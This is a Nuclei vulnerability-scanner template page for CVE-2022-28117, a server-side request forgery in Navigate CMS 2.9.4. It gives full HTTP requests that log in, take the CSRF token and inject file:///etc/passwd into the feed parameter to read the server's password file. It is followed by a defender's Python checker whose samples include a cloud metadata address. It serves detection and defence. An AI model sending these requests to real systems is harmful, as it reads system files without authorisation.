Navigate CMS 2.9.4 - Server-Side Request Forgery
ID: CVE-2022-28117
Severity: medium
Author: theabhinavgaur
Tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs
Description
Navigate CMS 2.9.4 is susceptible to server-side request forgery via the feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.
YAML Source
id: CVE-2022-28117

info:
  name: Navigate CMS 2.9.4 - Server-Side Request Forgery
  author: theabhinavgaur
  severity: medium
  description: |
    Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.
  impact: |
    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
  remediation: |
    Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html
    - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5
    - https://www.youtube.com/watch?v=4kHW95CMfD0
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28117
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 4.9
    cve-id: CVE-2022-28117
    cwe-id: CWE-918
    epss-score: 0.04745
    epss-percentile: 0.92658
    cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: naviwebs
    product: navigate_cms
  tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs

http:
  - raw:
      - |
        GET /navigate/login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /navigate/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890

        -----------------------------123456789012345678901234567890
        Content-Disposition: form-data; name="login-username"

        {{username}}
        -----------------------------123456789012345678901234567890
        Content-Disposition: form-data; name="csrf_token"

        {{csrf_token}}
        -----------------------------123456789012345678901234567890
        Content-Disposition: form-data; name="login-password"

        {{password}}
        -----------------------------123456789012345678901234567890
      - |
        POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        limit=5&language=en&url=file:///etc/passwd
      - |
        GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf_token
        group: 1
        regex:
          - csrf_token" value="([a-f0-9]{64})
        internal: true
        part: body
# digest: 490a0046304402206da25068dc65746170aa84131680fd50569da3330b6d593e2369bb7ff63d65360220694a66a3d3fb6b9d3bb47d9f6e3a7f7250c8c05e7b50387e4cd2958b0f8e04f0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-28117.yaml"
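
For defenders, the feed request in the template can also be watched for on the server side. The following is an added example, not part of the template or of Navigate CMS: it checks logged requests to the feed endpoint and flags `url` values that are not ordinary remote http(s) feeds. It assumes a proxy or WAF log that records the form body; the function names and sample requests are constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Query string of the feed request shown in the template above.
FEED_QUERY = {"fid": "dashboard", "act": "json", "oper": "feed"}

def is_feed_request(method, target):
    """True for POST .../navigate.php?fid=dashboard&act=json&oper=feed."""
    parts = urlsplit(target)
    query = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    return (method.upper() == "POST" and parts.path.endswith("/navigate.php")
            and all(query.get(k) == v for k, v in FEED_QUERY.items()))

def feed_url_verdict(feed_url):
    """Return None for an ordinary remote feed URL, else the reason to flag it."""
    try:
        parts = urlsplit(feed_url.strip())
        host = (parts.hostname or "").lower()
    except ValueError:
        return "unparseable url"
    if parts.scheme.lower() not in ("http", "https"):
        return f"scheme '{parts.scheme.lower()}' not allowed"
    if not host:
        return "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return "loopback host name"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # DNS name: the fetching side must re-check the resolved IP
    return None if addr.is_global else f"non-public address {addr}"

def inspect(method, target, body):
    """Check one logged request (form body included); return a reason or None."""
    if not is_feed_request(method, target):
        return None
    urls = parse_qs(body, keep_blank_values=True).get("url", [])
    return next((r for r in map(feed_url_verdict, urls) if r), None)

# Constructed sample requests (method, target, form body), not real traffic.
FEED = "/navigate/navigate.php?fid=dashboard&act=json&oper=feed"
SAMPLES = [
    ("POST", FEED, "limit=5&language=en&url=https://example.org/rss.xml"),
    ("POST", FEED, "limit=5&language=en&url=file:///etc/passwd"),
    ("POST", FEED, "limit=5&language=en&url=http://169.254.169.254/"),
]
if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[2], "->", inspect(*sample) or "ok")
```

The same verdict function can serve as input validation before a feed is fetched; the remediation remains upgrading to a patched version of Navigate CMS.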